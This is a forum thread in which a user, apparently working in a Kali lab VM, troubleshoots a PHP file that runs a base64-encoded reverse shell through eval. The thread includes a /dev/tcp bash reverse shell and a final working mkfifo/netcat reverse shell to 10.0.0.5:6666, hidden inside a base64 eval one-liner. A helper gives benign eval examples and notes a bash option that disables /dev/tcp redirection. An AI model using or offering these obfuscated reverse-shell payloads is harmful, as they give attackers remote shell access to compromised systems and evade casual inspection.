I’m trying to figure out how to execute a php file using the following code written in the file:
eval(base64_decode(""));
Where the contents within the quotes are a base64-encoded string. That string contains the payload:
<?php system('/bin/bash -i >& /dev/tcp/10.0.0.5/6666 0>&1'); ?>
I’m testing this in my kali VM using the following commands:
php -f test.php
./test.php
The former simply echoes the literal contents to the terminal: "eval(base64_decode…"
The latter shows the errors:
./test.php line 1: syntax error near the unexpected token `base64_decode'
./test.php line 1: `eval("base64-encoded-payload"));'
I’ve got a netcat listener setup on port 6666. Nothing happens. Can anyone point me in the right direction with this?
xtal
October 7, 2022, 10:34am
Some PHP script examples to show the execution of PHP script with eval function and bash script with system function:
$ cat script-A.php
<?php
echo date("o-m-d"), ": this is php script code running\n";
?>
$ php script-A.php
2022-10-07: this is php script code running
$ cat script-B.php
<?php
echo "php starts bash\n";
eval( "system(\"echo \$(date -I) : running bash script in eval function\");" );
?>
$ php script-B.php
php starts bash
2022-10-07 : running bash script in eval function
$ cat script-C.php
<?php
$code="c3lzdGVtKCJlY2hvICQoZGF0ZSAtSSkgOiBydW5uaW5nIGJhc2ggc2NyaXB0IGluIGV2YWwgZnVuY3Rpb24iKTs=";
echo "php evaluates: ", base64_decode($code), "\n";
eval( base64_decode($code) );
?>
$ php script-C.php
php evaluates: system("echo $(date -I) : running bash script in eval function");
2022-10-07 : running bash script in eval function
The string in the eval function is php code to evaluate. The string contains no <?php and ?> around the PHP code.
Hey I appreciate very much the examples you provided. It turns out I was using double php tags because of the ones in the payload itself; as your last comment suggested. Thank you.
The final result looks like:
echo "system('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.0.0.5 6666 > /tmp/f');" | base64 -w 0
I then copied the base64 string into a file as such:
<?php
eval( base64_decode("c3lzdGVtKCdybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL2Jhc2ggLWkgIDI+JjEgfCBuYyAxMC4wLjAuNSA2NjY2ID4gL3RtcC9mJyk7Cg==") );
?>
The former shell using /dev/tcp didn’t work either, though. The piped version does.
xtal
October 8, 2022, 2:24pm
GuyKazuya: /dev/tcp didn't work
/dev/tcp/host/port and also /dev/udp/host/port are interpreted by the bash shell. There exists no /dev/tcp in the virtual Unix file system.
Bash can be hardened with the option 'disable-net-redirections', so that bash does not interpret the /dev/tcp/... and /dev/udp/... special file names.
See: Installing Bash: Optional Features
Debian used this configuration up to version 4. Debian bash changelog 5.0